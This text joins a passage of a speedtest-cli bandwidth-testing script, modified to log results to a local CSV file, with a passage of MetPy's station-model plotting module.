except ImportError:
try:
import xml.etree.ElementTree as ET
except ImportError:
from xml.dom import minidom as DOM
ET = None
# Begin import game to handle Python 2 and Python 3
try:
from urllib2 import urlopen, Request, HTTPError, URLError
except ImportError:
from urllib.request import urlopen, Request, HTTPError, URLError
try:
from httplib import HTTPConnection, HTTPSConnection
except ImportError:
from http.client import HTTPConnection, HTTPSConnection
try:
from Queue import Queue
except ImportError:
from queue import Queue
try:
from urlparse import urlparse
except ImportError:
from urllib.parse import urlparse
try:
from urlparse import parse_qs
except ImportError:
try:
from urllib.parse import parse_qs
except ImportError:
from cgi import parse_qs
try:
from hashlib import md5
except ImportError:
from md5 import md5
try:
from argparse import ArgumentParser as ArgParser
except ImportError:
from optparse import OptionParser as ArgParser
try:
import builtins
except ImportError:
def print_(*args, **kwargs):
"""The new-style print function taken from
https://pypi.python.org/pypi/six/
"""
fp = kwargs.pop("file", sys.stdout)
if fp is None:
return
def write(data):
if not isinstance(data, basestring):
data = str(data)
fp.write(data)
want_unicode = False
sep = kwargs.pop("sep", None)
if sep is not None:
if isinstance(sep, unicode):
want_unicode = True
elif not isinstance(sep, str):
raise TypeError("sep must be None or a string")
end = kwargs.pop("end", None)
if end is not None:
if isinstance(end, unicode):
want_unicode = True
elif not isinstance(end, str):
raise TypeError("end must be None or a string")
if kwargs:
raise TypeError("invalid keyword arguments to print()")
if not want_unicode:
for arg in args:
if isinstance(arg, unicode):
want_unicode = True
break
if want_unicode:
newline = unicode("\n")
space = unicode(" ")
else:
newline = "\n"
space = " "
if sep is None:
sep = space
if end is None:
end = newline
for i, arg in enumerate(args):
if i:
write(sep)
write(arg)
write(end)
else:
print_ = getattr(builtins, 'print')
del builtins
class SpeedtestCliServerListError(Exception):
"""Internal Exception class used to indicate to move on to the next
URL for retrieving speedtest.net server details
"""
def bound_socket(*args, **kwargs):
"""Bind socket to a specified source IP address"""
global source
sock = socket_socket(*args, **kwargs)
sock.bind((source, 0))
return sock
def distance(origin, destination):
"""Determine distance between 2 sets of [lat,lon] in km"""
lat1, lon1 = origin
lat2, lon2 = destination
radius = 6371 # km
dlat = math.radians(lat2 - lat1)
dlon = math.radians(lon2 - lon1)
a = (math.sin(dlat / 2) * math.sin(dlat / 2) +
math.cos(math.radians(lat1)) *
math.cos(math.radians(lat2)) * math.sin(dlon / 2) *
math.sin(dlon / 2))
c = 2 * math.atan2(math.sqrt(a), math.sqrt(1 - a))
d = radius * c
return d
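# Hedged example (not part of the original script): great-circle distance
# between two illustrative [lat, lon] pairs, roughly Berlin -> Paris (~880 km).
#   d_km = distance([52.52, 13.405], [48.86, 2.35])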
def build_request(url, data=None, headers={}):
"""Build a urllib2 request object
This function automatically adds a User-Agent header to all requests
"""
headers['User-Agent'] = user_agent
return Request(url, data=data, headers=headers)
def catch_request(request):
"""Helper function to catch common exceptions encountered when
establishing a connection with a HTTP/HTTPS request
"""
try:
uh = urlopen(request)
return uh
except (HTTPError, URLError, socket.error):
return False
class FileGetter(threading.Thread):
"""Thread class for retrieving a URL"""
def __init__(self, url, start):
self.url = url
self.result = None
self.starttime = start
threading.Thread.__init__(self)
def run(self):
self.result = [0]
try:
if (timeit.default_timer() - self.starttime) <= 10:
request = build_request(self.url)
f = urlopen(request)
while 1 and not shutdown_event.isSet():
self.result.append(len(f.read(10240)))
if self.result[-1] == 0:
break
f.close()
except IOError:
pass
def downloadSpeed(files, quiet=False):
"""Function to launch FileGetter threads and calculate download speeds"""
start = timeit.default_timer()
def producer(q, files):
for file in files:
thread = FileGetter(file, start)
thread.start()
q.put(thread, True)
if not quiet and not shutdown_event.isSet():
sys.stdout.write('.')
sys.stdout.flush()
finished = []
def consumer(q, total_files):
while len(finished) < total_files:
thread = q.get(True)
while thread.isAlive():
thread.join(timeout=0.1)
finished.append(sum(thread.result))
del thread
q = Queue(6)
prod_thread = threading.Thread(target=producer, args=(q, files))
cons_thread = threading.Thread(target=consumer, args=(q, len(files)))
start = timeit.default_timer()
prod_thread.start()
cons_thread.start()
while prod_thread.isAlive():
prod_thread.join(timeout=0.1)
while cons_thread.isAlive():
cons_thread.join(timeout=0.1)
return (sum(finished) / (timeit.default_timer() - start))
class FilePutter(threading.Thread):
"""Thread class for putting a URL"""
def __init__(self, url, start, size):
self.url = url
chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ'
data = chars * (int(round(int(size) / 36.0)))
self.data = ('content1=%s' % data[0:int(size) - 9]).encode()
del data
self.result = None
self.starttime = start
threading.Thread.__init__(self)
def run(self):
try:
if ((timeit.default_timer() - self.starttime) <= 10 and
not shutdown_event.isSet()):
request = build_request(self.url, data=self.data)
f = urlopen(request)
f.read(11)
f.close()
self.result = len(self.data)
else:
self.result = 0
except IOError:
self.result = 0
def uploadSpeed(url, sizes, quiet=False):
"""Function to launch FilePutter threads and calculate upload speeds"""
start = timeit.default_timer()
def producer(q, sizes):
for size in sizes:
thread = FilePutter(url, start, size)
thread.start()
q.put(thread, True)
if not quiet and not shutdown_event.isSet():
sys.stdout.write('.')
sys.stdout.flush()
finished = []
def consumer(q, total_sizes):
while len(finished) < total_sizes:
thread = q.get(True)
while thread.isAlive():
thread.join(timeout=0.1)
finished.append(thread.result)
del thread
q = Queue(6)
prod_thread = threading.Thread(target=producer, args=(q, sizes))
cons_thread = threading.Thread(target=consumer, args=(q, len(sizes)))
start = timeit.default_timer()
prod_thread.start()
cons_thread.start()
while prod_thread.isAlive():
prod_thread.join(timeout=0.1)
while cons_thread.isAlive():
cons_thread.join(timeout=0.1)
return (sum(finished) / (timeit.default_timer() - start))
def getAttributesByTagName(dom, tagName):
"""Retrieve an attribute from an XML document and return it in a
consistent format
Only used with xml.dom.minidom, which is likely only to be used
with python versions older than 2.5
"""
elem = dom.getElementsByTagName(tagName)[0]
return dict(list(elem.attributes.items()))
def getConfig():
"""Download the speedtest.net configuration and return only the data
we are interested in
"""
request = build_request('https://www.speedtest.net/speedtest-config.php')
uh = catch_request(request)
if uh is False:
print_('Could not retrieve speedtest.net configuration')
sys.exit(1)
configxml = []
while 1:
configxml.append(uh.read(10240))
if len(configxml[-1]) == 0:
break
if int(uh.code) != 200:
return None
uh.close()
try:
try:
root = ET.fromstring(''.encode().join(configxml))
config = {
'client': root.find('client').attrib,
'times': root.find('times').attrib,
'download': root.find('download').attrib,
'upload': root.find('upload').attrib}
except AttributeError: # Python3 branch
root = DOM.parseString(''.join(configxml))
config = {
'client': getAttributesByTagName(root, 'client'),
'times': getAttributesByTagName(root, 'times'),
'download': getAttributesByTagName(root, 'download'),
'upload': getAttributesByTagName(root, 'upload')}
except SyntaxError:
print_('Failed to parse speedtest.net configuration')
sys.exit(1)
del root
del configxml
return config
def closestServers(client, all=False):
"""Determine the 5 closest speedtest.net servers based on geographic
distance
"""
urls = [
'https://www.speedtest.net/speedtest-servers-static.php',
'http://c.speedtest.net/speedtest-servers-static.php',
]
servers = {}
for url in urls:
try:
request = build_request(url)
uh = catch_request(request)
if uh is False:
raise SpeedtestCliServerListError
serversxml = []
while 1:
serversxml.append(uh.read(10240))
if len(serversxml[-1]) == 0:
break
if int(uh.code) != 200:
uh.close()
raise SpeedtestCliServerListError
uh.close()
try:
try:
root = ET.fromstring(''.encode().join(serversxml))
elements = root.getiterator('server')
except AttributeError: # Python3 branch
root = DOM.parseString(''.join(serversxml))
elements = root.getElementsByTagName('server')
except SyntaxError:
raise SpeedtestCliServerListError
for server in elements:
try:
attrib = server.attrib
except AttributeError:
attrib = dict(list(server.attributes.items()))
d = distance([float(client['lat']),
float(client['lon'])],
[float(attrib.get('lat')),
float(attrib.get('lon'))])
attrib['d'] = d
if d not in servers:
servers[d] = [attrib]
else:
servers[d].append(attrib)
del root
del serversxml
del elements
except SpeedtestCliServerListError:
continue
# We were able to fetch and parse the list of speedtest.net servers
if servers:
break
if not servers:
print_('Failed to retrieve list of speedtest.net servers')
sys.exit(1)
closest = []
for d in sorted(servers.keys()):
for s in servers[d]:
closest.append(s)
if len(closest) == 5 and not all:
break
else:
continue
break
del servers
return closest
def getBestServer(servers):
"""Perform a speedtest.net latency request to determine which
speedtest.net server has the lowest latency
"""
results = {}
for server in servers:
cum = []
url = '%s/latency.txt' % os.path.dirname(server['url'])
urlparts = urlparse(url)
for i in range(0, 3):
try:
if urlparts[0] == 'https':
h = HTTPSConnection(urlparts[1])
else:
h = HTTPConnection(urlparts[1])
headers = {'User-Agent': user_agent}
start = timeit.default_timer()
h.request("GET", urlparts[2], headers=headers)
r = h.getresponse()
total = (timeit.default_timer() - start)
except (HTTPError, URLError, socket.error):
cum.append(3600)
continue
text = r.read(9)
if int(r.status) == 200 and text == 'test=test'.encode():
cum.append(total)
else:
cum.append(3600)
h.close()
avg = round((sum(cum) / 6) * 1000, 3)
results[avg] = server
fastest = sorted(results.keys())[0]
best = results[fastest]
best['latency'] = fastest
return best
def ctrl_c(signum, frame):
"""Catch Ctrl-C key sequence and set a shutdown_event for our threaded
operations
"""
global shutdown_event
shutdown_event.set()
raise SystemExit('\nCancelling...')
def version():
"""Print the version"""
raise SystemExit(__version__)
def speedtest():
"""Run the full speedtest.net test"""
global shutdown_event, source, isp_name
shutdown_event = threading.Event()
signal.signal(signal.SIGINT, ctrl_c)
description = (
'Command line interface for testing internet bandwidth using '
'speedtest.net.\n'
'------------------------------------------------------------'
'--------------\n'
'https://github.com/sivel/speedtest-cli')
parser = ArgParser(description=description)
# Give optparse.OptionParser an `add_argument` method for
# compatibility with argparse.ArgumentParser
try:
parser.add_argument = parser.add_option
except AttributeError:
pass
parser.add_argument('--bytes', dest='units', action='store_const',
const=('byte', 1), default=('bit', 8),
help='Display values in bytes instead of bits. Does '
'not affect the image generated by --share')
parser.add_argument('--share', action='store_true',
help='Generate and provide a URL to the speedtest.net '
'share results image')
parser.add_argument('--simple', action='store_true',
help='Suppress verbose output, only show basic '
'information')
parser.add_argument('--list', action='store_true',
help='Display a list of speedtest.net servers '
'sorted by distance')
parser.add_argument('--server', help='Specify a server ID to test against')
parser.add_argument('--mini', help='URL of the Speedtest Mini server')
parser.add_argument('--source', help='Source IP address to bind to')
parser.add_argument('--timeout', default=10, type=int,
help='HTTP timeout in seconds. Default 10')
parser.add_argument('--version', action='store_true',
help='Show the version number and exit')
options = parser.parse_args()
if isinstance(options, tuple):
args = options[0]
else:
args = options
del options
# Print the version and exit
if args.version:
version()
socket.setdefaulttimeout(args.timeout)
# If specified bind to a specific IP address
if args.source:
source = args.source
socket.socket = bound_socket
if not args.simple:
print_('Retrieving speedtest.net configuration...')
try:
config = getConfig()
except URLError:
print_('Cannot retrieve speedtest configuration')
sys.exit(1)
if not args.simple:
print_('Retrieving speedtest.net server list...')
if args.list or args.server:
servers = closestServers(config['client'], True)
if args.list:
serverList = []
for server in servers:
line = ('%(id)4s) %(sponsor)s (%(name)s, %(country)s) '
'[%(d)0.2f km]' % server)
serverList.append(line)
# Python 2.7 and newer seem to be ok with the resultant encoding
# from parsing the XML, but older versions have some issues.
# This block should detect whether we need to encode or not
try:
unicode()
print_('\n'.join(serverList).encode('utf-8', 'ignore'))
except NameError:
print_('\n'.join(serverList))
except IOError:
pass
sys.exit(0)
else:
servers = closestServers(config['client'])
if not args.simple:
print_('Testing from %(isp)s (%(ip)s)...' % config['client'])
if args.server:
try:
best = getBestServer(filter(lambda x: x['id'] == args.server,
servers))
except IndexError:
print_('Invalid server ID')
sys.exit(1)
elif args.mini:
name, ext = os.path.splitext(args.mini)
if ext:
url = os.path.dirname(args.mini)
else:
url = args.mini
urlparts = urlparse(url)
try:
request = build_request(args.mini)
f = urlopen(request)
except:
print_('Invalid Speedtest Mini URL')
sys.exit(1)
else:
text = f.read()
f.close()
extension = re.findall('upload_extension: "([^"]+)"', text.decode())
if not extension:
for ext in ['php', 'asp', 'aspx', 'jsp']:
try:
request = build_request('%s/speedtest/upload.%s' %
(args.mini, ext))
f = urlopen(request)
except:
pass
else:
data = f.read().strip()
if (f.code == 200 and
len(data.splitlines()) == 1 and
re.match('size=[0-9]', data)):
extension = [ext]
break
if not urlparts or not extension:
print_('Please provide the full URL of your Speedtest Mini server')
sys.exit(1)
servers = [{
'sponsor': 'Speedtest Mini',
'name': urlparts[1],
'd': 0,
'url': '%s/speedtest/upload.%s' % (url.rstrip('/'), extension[0]),
'latency': 0,
'id': 0
}]
try:
best = getBestServer(servers)
except:
best = servers[0]
else:
if not args.simple:
print_('Selecting best server based on latency...')
best = getBestServer(servers)
if not args.simple:
# Python 2.7 and newer seem to be ok with the resultant encoding
# from parsing the XML, but older versions have some issues.
# This block should detect whether we need to encode or not
try:
unicode()
print_(('Hosted by %(sponsor)s (%(name)s) [%(d)0.2f km]: '
'%(latency)s ms' % best).encode('utf-8', 'ignore'))
isp_name = (('Hosted by %(sponsor)s (%(name)s) [%(d)0.2f km]: '
'%(latency)s ms' % best).encode('utf-8', 'ignore'))
except NameError:
print_('Hosted by %(sponsor)s (%(name)s) [%(d)0.2f km]: '
'%(latency)s ms' % best)
else:
print_('Ping: %(latency)s ms' % best)
sizes = [350, 500, 750, 1000, 1500, 2000, 2500, 3000, 3500, 4000]
urls = []
for size in sizes:
for i in range(0, 4):
urls.append('%s/random%sx%s.jpg' %
(os.path.dirname(best['url']), size, size))
if not args.simple:
print_('Testing download speed', end='')
dlspeed = downloadSpeed(urls, args.simple)
if not args.simple:
print_()
print_('Download: %0.2f M%s/s' %
((dlspeed / 1000 / 1000) * args.units[1], args.units[0]))
# This is a line I have added
download.append('Download: %0.2f M%s/s' %
((dlspeed / 1000 / 1000) * args.units[1], args.units[0]))
sizesizes = [int(.25 * 1000 * 1000), int(.5 * 1000 * 1000)]
sizes = []
for size in sizesizes:
for i in range(0, 25):
sizes.append(size)
if not args.simple:
print_('Testing upload speed', end='')
ulspeed = uploadSpeed(best['url'], sizes, args.simple)
if not args.simple:
print_()
print_('Upload: %0.2f M%s/s' %
((ulspeed / 1000 / 1000) * args.units[1], args.units[0]))
upload.append('Upload: %0.2f M%s/s' %
((ulspeed / 1000 / 1000) * args.units[1], args.units[0]))
if args.share and args.mini:
print_('Cannot generate a speedtest.net share results image while '
'testing against a Speedtest Mini server')
elif args.share:
dlspeedk = int(round((dlspeed / 1000) * 8, 0))
ping = int(round(best['latency'], 0))
ulspeedk = int(round((ulspeed / 1000) * 8, 0))
# Build the request to send results back to speedtest.net
# We use a list instead of a dict because the API expects parameters
# in a certain order
apiData = [
'download=%s' % dlspeedk,
'ping=%s' % ping,
'upload=%s' % ulspeedk,
'promo=',
'startmode=%s' % 'pingselect',
'recommendedserverid=%s' % best['id'],
'accuracy=%s' % 1,
'serverid=%s' % best['id'],
'hash=%s' % md5(('%s-%s-%s-%s' %
(ping, ulspeedk, dlspeedk, '297aae72'))
.encode()).hexdigest()]
headers = {'Referer': 'https://c.speedtest.net/flash/speedtest.swf'}
request = build_request('https://www.speedtest.net/api/api.php',
data='&'.join(apiData).encode(),
headers=headers)
f = catch_request(request)
if f is False:
print_('Could not submit results to speedtest.net')
sys.exit(1)
response = f.read()
code = f.code
f.close()
if int(code) != 200:
print_('Could not submit results to speedtest.net')
sys.exit(1)
qsargs = parse_qs(response.decode())
resultid = qsargs.get('resultid')
if not resultid or len(resultid) != 1:
print_('Could not submit results to speedtest.net')
sys.exit(1)
print_('Share results: https://www.speedtest.net/result/%s.png' %
resultid[0])
def main():
try:
speedtest()
except KeyboardInterrupt:
print_('\nCancelling...')
if __name__ == '__main__':
main()
# vim:ts=4:sw=4:expandtab
# Print some test output
print("\nData from the most recent run")
print("Download speed: %s" % float(download[0][10:15]))
print("Upload speed: %s" % float(upload[0][8:13]))
# Bind the timestamp to its own name so the `time` module is not shadowed
timestamp = [time.strftime("%Y/%d/%m %H:%M:%S")]
# Make a data frame with updated data
temp_speed_frame = pd.DataFrame({"Time": timestamp, "Download": float(
    download[0][10:15]), "Upload": float(upload[0][8:13]), "location": isp_name})
# read in the historical data from the speed frame file
speed_frame = pd.read_csv(
"/Users/Nest/Documents/speedtest-cli-master/speed_frame.csv", index_col=None)
print("\nHistorical data from speed frame:")
print(speed_frame)
# Append the new data to the bottom of the speed frame
new_data = speed_frame.append(temp_speed_frame)
print("\nUpdated speed frame")
print(new_data)
# Output results to an updated file
new_data.to_csv(
"/Users/Nest/Documents/speedtest-cli-master/speed_frame.csv", index=False)
|
|
# Copyright (c) 2016 MetPy Developers.
# Distributed under the terms of the BSD 3-Clause License.
# SPDX-License-Identifier: BSD-3-Clause
"""Create Station-model plots."""
from enum import Enum
import numpy as np
from .wx_symbols import (current_weather, high_clouds, low_clouds, mid_clouds,
pressure_tendency, sky_cover, wx_symbol_font)
from ..package_tools import Exporter
from ..units import atleast_1d
exporter = Exporter(globals())
@exporter.export
class StationPlot(object):
"""Make a standard meteorological station plot.
    Plots values, symbols, or text spaced around a central location. Can also plot wind
    barbs at the center of the location.
"""
location_names = {'C': (0, 0), 'N': (0, 1), 'NE': (1, 1), 'E': (1, 0), 'SE': (1, -1),
'S': (0, -1), 'SW': (-1, -1), 'W': (-1, 0), 'NW': (-1, 1),
'N2': (0, 2), 'NNE': (1, 2), 'ENE': (2, 1), 'E2': (2, 0),
'ESE': (2, -1), 'SSE': (1, -2), 'S2': (0, -2), 'SSW': (-1, -2),
'WSW': (-2, -1), 'W2': (-2, 0), 'WNW': (-2, 1), 'NNW': (-1, 2)}
def __init__(self, ax, x, y, fontsize=10, spacing=None, transform=None, **kwargs):
"""Initialize the StationPlot with items that do not change.
This sets up the axes and station locations. The `fontsize` and `spacing`
are also specified here to ensure that they are consistent between individual
station elements.
Parameters
----------
ax : matplotlib.axes.Axes
The :class:`~matplotlib.axes.Axes` for plotting
x : array_like
The x location of the stations in the plot
y : array_like
The y location of the stations in the plot
fontsize : int
The fontsize to use for drawing text
spacing : int
The spacing, in points, that corresponds to a single increment between
station plot elements.
transform : matplotlib.transforms.Transform (or compatible)
The default transform to apply to the x and y positions when plotting.
kwargs
Additional keyword arguments to use for matplotlib's plotting functions.
These will be passed to all the plotting methods, and thus need to be valid
for all plot types, such as `clip_on`.
"""
self.ax = ax
self.x = atleast_1d(x)
self.y = atleast_1d(y)
self.fontsize = fontsize
self.spacing = fontsize if spacing is None else spacing
self.transform = transform
self.items = {}
self.barbs = None
self.arrows = None
self.default_kwargs = kwargs
def plot_symbol(self, location, codes, symbol_mapper, **kwargs):
"""At the specified location in the station model plot a set of symbols.
This specifies that at the offset `location`, the data in `codes` should be
converted to unicode characters (for our :data:`wx_symbol_font`) using `symbol_mapper`,
and plotted.
Additional keyword arguments given will be passed onto the actual plotting
code; this is useful for specifying things like color or font properties.
If something has already been plotted at this location, it will be replaced.
Parameters
----------
location : str or tuple[float, float]
The offset (relative to center) to plot this parameter. If str, should be one of
'C', 'N', 'NE', 'E', 'SE', 'S', 'SW', 'W', or 'NW'. Otherwise, should be a tuple
specifying the number of increments in the x and y directions; increments
are multiplied by `spacing` to give offsets in x and y relative to the center.
codes : array_like
The numeric values that should be converted to unicode characters for plotting.
symbol_mapper : callable
Controls converting data values to unicode code points for the
:data:`wx_symbol_font` font. This should take a value and return a single unicode
character. See :mod:`metpy.plots.wx_symbols` for included mappers.
kwargs
Additional keyword arguments to use for matplotlib's plotting functions.
.. plot::
import matplotlib.pyplot as plt
import numpy as np
from math import ceil
from metpy.plots import StationPlot
from metpy.plots.wx_symbols import current_weather, current_weather_auto
from metpy.plots.wx_symbols import low_clouds, mid_clouds, high_clouds
from metpy.plots.wx_symbols import sky_cover, pressure_tendency
def plot_symbols(mapper, name, nwrap=12, figsize=(10, 1.4)):
# Determine how many symbols there are and layout in rows of nwrap
# if there are more than nwrap symbols
num_symbols = len(mapper)
codes = np.arange(len(mapper))
ncols = nwrap
if num_symbols <= nwrap:
nrows = 1
x = np.linspace(0, 1, len(mapper))
y = np.ones_like(x)
ax_height = 0.8
else:
nrows = int(ceil(num_symbols / ncols))
x = np.tile(np.linspace(0, 1, ncols), nrows)[:num_symbols]
y = np.repeat(np.arange(nrows, 0, -1), ncols)[:num_symbols]
figsize = (10, 1 * nrows + 0.4)
ax_height = 0.8 + 0.018 * nrows
fig = plt.figure(figsize=figsize, dpi=300)
ax = fig.add_axes([0, 0, 1, ax_height])
ax.set_title(name, size=20)
ax.xaxis.set_ticks([])
ax.yaxis.set_ticks([])
ax.set_frame_on(False)
# Plot
sp = StationPlot(ax, x, y, fontsize=36)
sp.plot_symbol('C', codes, mapper)
sp.plot_parameter((0, -1), codes, fontsize=18)
ax.set_ylim(-0.05, nrows + 0.5)
plt.show()
plot_symbols(current_weather, "Current Weather Symbols")
plot_symbols(current_weather_auto, "Current Weather Auto Reported Symbols")
plot_symbols(low_clouds, "Low Cloud Symbols")
plot_symbols(mid_clouds, "Mid Cloud Symbols")
plot_symbols(high_clouds, "High Cloud Symbols")
plot_symbols(sky_cover, "Sky Cover Symbols")
plot_symbols(pressure_tendency, "Pressure Tendency Symbols")
See Also
--------
plot_barb, plot_parameter, plot_text
"""
# Make sure we use our font for symbols
kwargs['fontproperties'] = wx_symbol_font.copy()
return self.plot_parameter(location, codes, symbol_mapper, **kwargs)
def plot_parameter(self, location, parameter, formatter='.0f', **kwargs):
"""At the specified location in the station model plot a set of values.
This specifies that at the offset `location`, the data in `parameter` should be
plotted. The conversion of the data values to a string is controlled by `formatter`.
Additional keyword arguments given will be passed onto the actual plotting
code; this is useful for specifying things like color or font properties.
If something has already been plotted at this location, it will be replaced.
Parameters
----------
location : str or tuple[float, float]
The offset (relative to center) to plot this parameter. If str, should be one of
'C', 'N', 'NE', 'E', 'SE', 'S', 'SW', 'W', or 'NW'. Otherwise, should be a tuple
specifying the number of increments in the x and y directions; increments
are multiplied by `spacing` to give offsets in x and y relative to the center.
parameter : array_like
The numeric values that should be plotted
formatter : str or callable, optional
How to format the data as a string for plotting. If a string, it should be
compatible with the :func:`format` builtin. If a callable, this should take a
value and return a string. Defaults to '.0f'.
kwargs
Additional keyword arguments to use for matplotlib's plotting functions.
See Also
--------
plot_barb, plot_symbol, plot_text
"""
if hasattr(parameter, 'units'):
parameter = parameter.magnitude
text = self._to_string_list(parameter, formatter)
return self.plot_text(location, text, **kwargs)
def plot_text(self, location, text, **kwargs):
"""At the specified location in the station model plot a collection of text.
This specifies that at the offset `location`, the strings in `text` should be
plotted.
Additional keyword arguments given will be passed onto the actual plotting
code; this is useful for specifying things like color or font properties.
If something has already been plotted at this location, it will be replaced.
Parameters
----------
location : str or tuple[float, float]
The offset (relative to center) to plot this parameter. If str, should be one of
'C', 'N', 'NE', 'E', 'SE', 'S', 'SW', 'W', or 'NW'. Otherwise, should be a tuple
specifying the number of increments in the x and y directions; increments
are multiplied by `spacing` to give offsets in x and y relative to the center.
text : list (or array) of strings
The strings that should be plotted
kwargs
Additional keyword arguments to use for matplotlib's plotting functions.
See Also
--------
plot_barb, plot_parameter, plot_symbol
"""
location = self._handle_location(location)
kwargs = self._make_kwargs(kwargs)
text_collection = self.ax.scattertext(self.x, self.y, text, loc=location,
size=kwargs.pop('fontsize', self.fontsize),
**kwargs)
if location in self.items:
self.items[location].remove()
self.items[location] = text_collection
return text_collection
def plot_barb(self, u, v, **kwargs):
r"""At the center of the station model plot wind barbs.
Additional keyword arguments given will be passed onto matplotlib's
:meth:`~matplotlib.axes.Axes.barbs` function; this is useful for specifying things
like color or line width.
Parameters
----------
u : array-like
The data to use for the u-component of the barbs.
v : array-like
The data to use for the v-component of the barbs.
plot_units : `pint.unit`
Units to plot in (performing conversion if necessary). Defaults to given units.
kwargs
Additional keyword arguments to pass to matplotlib's
:meth:`~matplotlib.axes.Axes.barbs` function.
See Also
--------
plot_arrow, plot_parameter, plot_symbol, plot_text
"""
kwargs = self._make_kwargs(kwargs)
# If plot_units specified, convert the data to those units
plotting_units = kwargs.pop('plot_units', None)
u, v = self._plotting_units(u, v, plotting_units)
# Empirically determined
pivot = 0.51 * np.sqrt(self.fontsize)
length = 1.95 * np.sqrt(self.fontsize)
defaults = {'sizes': {'spacing': .15, 'height': 0.5, 'emptybarb': 0.35},
'length': length, 'pivot': pivot}
defaults.update(kwargs)
# Remove old barbs
if self.barbs:
self.barbs.remove()
self.barbs = self.ax.barbs(self.x, self.y, u, v, **defaults)
def plot_arrow(self, u, v, **kwargs):
r"""At the center of the station model plot wind arrows.
Additional keyword arguments given will be passed onto matplotlib's
:meth:`~matplotlib.axes.Axes.quiver` function; this is useful for specifying things
like color or line width.
Parameters
----------
u : array-like
The data to use for the u-component of the arrows.
v : array-like
The data to use for the v-component of the arrows.
plot_units : `pint.unit`
Units to plot in (performing conversion if necessary). Defaults to given units.
kwargs
Additional keyword arguments to pass to matplotlib's
:meth:`~matplotlib.axes.Axes.quiver` function.
See Also
--------
plot_barb, plot_parameter, plot_symbol, plot_text
"""
kwargs = self._make_kwargs(kwargs)
# If plot_units specified, convert the data to those units
plotting_units = kwargs.pop('plot_units', None)
u, v = self._plotting_units(u, v, plotting_units)
defaults = {'pivot': 'tail', 'scale': 20, 'scale_units': 'inches', 'width': 0.002}
defaults.update(kwargs)
# Remove old arrows
if self.arrows:
self.arrows.remove()
self.arrows = self.ax.quiver(self.x, self.y, u, v, **defaults)
@staticmethod
def _plotting_units(u, v, plotting_units):
"""Handle conversion to plotting units for barbs and arrows."""
if plotting_units:
if hasattr(u, 'units') and hasattr(v, 'units'):
u = u.to(plotting_units)
v = v.to(plotting_units)
else:
raise ValueError('To convert to plotting units, units must be attached to '
'u and v wind components.')
# Strip units, since the CartoPy transform doesn't like them
u = np.array(u)
v = np.array(v)
return u, v
def _make_kwargs(self, kwargs):
"""Assemble kwargs as necessary.
Inserts our defaults as well as ensures transform is present when appropriate.
"""
# Use default kwargs and update with additional ones
all_kw = self.default_kwargs.copy()
all_kw.update(kwargs)
# Pass transform if necessary
if 'transform' not in all_kw and self.transform:
all_kw['transform'] = self.transform
return all_kw
@staticmethod
def _to_string_list(vals, fmt):
"""Convert a sequence of values to a list of strings."""
if not callable(fmt):
def formatter(s):
"""Turn a format string into a callable."""
return format(s, fmt)
else:
formatter = fmt
return [formatter(v) if np.isfinite(v) else '' for v in vals]
def _handle_location(self, location):
"""Process locations to get a consistent set of tuples for location."""
if isinstance(location, str):
location = self.location_names[location]
xoff, yoff = location
return xoff * self.spacing, yoff * self.spacing
@exporter.export
class StationPlotLayout(dict):
r"""make a layout to encapsulate plotting using :class:`StationPlot`.
This class keeps a collection of offsets, plot formats, etc. for a parameter based
on its name. This then allows a dictionary of data (or any object that allows looking
up of arrays based on a name) to be passed to :meth:`plot()` to plot the data all at once.
See Also
--------
StationPlot
"""
class PlotTypes(Enum):
r"""Different plotting types for the layout.
Controls how items are displayed (e.g. converting values to symbols).
"""
value = 1
symbol = 2
text = 3
barb = 4
def add_value(self, location, name, fmt='.0f', units=None, **kwargs):
r"""Add a numeric value to the station layout.
This specifies that at the offset `location`, data should be pulled from the data
container using the key `name` and plotted. The conversion of the data values to
a string is controlled by `fmt`. The units required for plotting can also
be passed in using `units`, which will cause the data to be converted before
plotting.
Additional keyword arguments given will be passed onto the actual plotting
code; this is useful for specifying things like color or font properties.
Parameters
----------
location : str or tuple[float, float]
The offset (relative to center) to plot this value. If str, should be one of
'C', 'N', 'NE', 'E', 'SE', 'S', 'SW', 'W', or 'NW'. Otherwise, should be a tuple
specifying the number of increments in the x and y directions.
name : str
The name of the parameter, which is used as a key to pull data out of the
data container passed to :meth:`plot`.
fmt : str or callable, optional
How to format the data as a string for plotting. If a string, it should be
compatible with the :func:`format` builtin. If a callable, this should take a
value and return a string. Defaults to '.0f'.
units : pint-compatible unit, optional
The units to use for plotting. Data will be converted to this unit before
conversion to a string. If not specified, no conversion is done.
kwargs
Additional keyword arguments to use for matplotlib's plotting functions.
See Also
--------
add_barb, add_symbol, add_text
"""
self[location] = (self.PlotTypes.value, name, (fmt, units, kwargs))
def add_symbol(self, location, name, symbol_mapper, **kwargs):
r"""Add a symbol to the station layout.
This specifies that at the offset `location`, data should be pulled from the data
container using the key `name` and plotted. Data values will be converted to glyphs
appropriate for MetPy's symbol font using the callable `symbol_mapper`.
Additional keyword arguments given will be passed onto the actual plotting
code; this is useful for specifying things like color or font properties.
Parameters
----------
location : str or tuple[float, float]
The offset (relative to center) to plot this value. If str, should be one of
'C', 'N', 'NE', 'E', 'SE', 'S', 'SW', 'W', or 'NW'. Otherwise, should be a tuple
specifying the number of increments in the x and y directions.
name : str
The name of the parameter, which is used as a key to pull data out of the
data container passed to :meth:`plot`.
symbol_mapper : callable
Controls converting data values to unicode code points for the
:data:`wx_symbol_font` font. This should take a value and return a single unicode
character. See :mod:`metpy.plots.wx_symbols` for included mappers.
kwargs
Additional keyword arguments to use for matplotlib's plotting functions.
See Also
--------
add_barb, add_text, add_value
"""
self[location] = (self.PlotTypes.symbol, name, (symbol_mapper, kwargs))
def add_text(self, location, name, **kwargs):
r"""Add a text field to the station layout.
This specifies that at the offset `location`, data should be pulled from the data
container using the key `name` and plotted directly as text with no conversion
applied.
Additional keyword arguments given will be passed onto the actual plotting
code; this is useful for specifying things like color or font properties.
Parameters
----------
location : str or tuple[float, float]
The offset (relative to center) to plot this value. If str, should be one of
'C', 'N', 'NE', 'E', 'SE', 'S', 'SW', 'W', or 'NW'. Otherwise, should be a tuple
specifying the number of increments in the x and y directions.
name : str
The name of the parameter, which is used as a key to pull data out of the
data container passed to :meth:`plot`.
kwargs
Additional keyword arguments to use for matplotlib's plotting functions.
See Also
--------
add_barb, add_symbol, add_value
"""
self[location] = (self.PlotTypes.text, name, kwargs)
def add_barb(self, u_name, v_name, units=None, **kwargs):
r"""Add a wind barb to the center of the station layout.
This specifies that u- and v-component data should be pulled from the data
container using the keys `u_name` and `v_name`, respectively, and plotted as
